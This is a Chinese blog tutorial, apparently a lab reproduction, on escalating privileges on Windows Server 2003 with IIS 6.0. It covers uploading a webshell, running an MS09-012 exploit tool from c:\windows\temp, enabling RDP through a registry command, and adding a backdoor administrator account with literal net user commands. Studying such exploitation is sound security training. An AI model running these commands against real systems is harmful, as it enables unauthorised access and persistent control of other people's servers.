Windows2003系统漏洞提权复现

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

操作系统: Microsoft Windows Server 2003

Web服务器: IIS V6.0

第一步,将大马文件上传至服务器根目录

第二步,访问大马文件,进入大马的控制界面

 

第三步,查看漏洞补丁信息

 

第四步,上传漏洞工具

将提权工具( 此处使用MS09-012漏洞工具 )上传到系统中,windows系统的回收站c:\windows\Temp目录默认具有上传和执行的权限

第五步,利用工具进行提权

payload

/c c:\windows\temp\pr.exe "whoami"

第六步,开启远程桌面端口

命令行查看是否开启3389( 远程桌面 )端口

/c c:\windows\temp\pr.exe "netstat -ano"

 

 

上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 执行a.bat文件,开启3389端口

/c c:\windows\temp\pr.exe "c:\windows\temp\a.bat"

 查看3389是否开启成功

/c c:\windows\temp\pr.exe "netstat -ano"

 

第七步,添加管理员权限用户

添加普通用户tom

/c c:\windows\temp\pr.exe "net user tom 123456 /add"

 将tom添加至administrators,拥有管理员权限

/c c:\windows\temp\pr.exe "net localgroup administrators tom /add"

第八步,物理机连接远程桌面

 

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值